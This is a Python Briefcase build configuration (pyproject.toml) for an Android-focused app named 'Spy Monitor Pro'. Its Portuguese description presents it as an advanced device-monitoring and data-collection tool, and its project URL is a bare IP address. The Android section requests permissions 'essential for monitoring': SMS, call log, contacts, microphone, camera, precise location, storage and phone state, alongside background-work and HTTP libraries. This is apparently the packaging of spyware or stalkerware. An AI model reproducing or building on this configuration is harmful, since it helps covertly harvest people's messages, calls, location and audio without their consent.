[build-system]
requires = ["briefcase"]

[tool.briefcase]
project_name = "SpyMonitor"
bundle = "org.beeware.spymonitor.v2"
version = "2.0.1"
url = "https://147.79.111.118/"
license = {file = "LICENSE"}
author = "Iuri Rodrigues"
author_email = "irodti93@gmail.com"

[tool.briefcase.app.spymonitor]
formal_name = "Spy Monitor Pro"
description = "Aplicativo avançado de monitoramento e coleta de dados de dispositivos"
icon = "logo"
sources = ["spymonitor"]
requires = []
url_scheme = "spymonitor"

[tool.briefcase.app.spymonitor.macOS]
requires = []

[tool.briefcase.app.spymonitor.linux]
requires = []

[tool.briefcase.app.spymonitor.windows]
requires = []

[tool.briefcase.app.spymonitor.iOS]
requires = []

[tool.briefcase.app.spymonitor.android]
android_main_activity = "org.beeware.android.MainActivity"
requires = [
    "toga-android>=0.4.0",
    "rubicon-java>=0.2.0",
    "plyer>=2.1.0",
    "requests>=2.28.0",
]
build_gradle_dependencies = [
    "androidx.core:core-ktx:1.12.0",
    "androidx.lifecycle:lifecycle-viewmodel-ktx:2.7.0",
    "androidx.activity:activity-ktx:1.8.2",
    "androidx.appcompat:appcompat:1.6.1",
    "com.google.android.material:material:1.11.0",
    "androidx.work:work-runtime:2.8.1",
]
exclude_packages = [
    "toga-gtk",
    "pycairo",
    "pygobject",
    "toga-winforms",
    "toga-cocoa",
    "toga-iOS",
]
# Permissões essenciais para monitoramento
permission_internet = true
permission_access_network_state = true
permission_wake_lock = true
permission_access_fine_location = true
permission_access_coarse_location = true
permission_read_external_storage = true
permission_write_external_storage = true
permission_camera = true
permission_record_audio = true
permission_read_contacts = true
permission_read_sms = true
permission_read_call_log = true
permission_read_phone_state = true
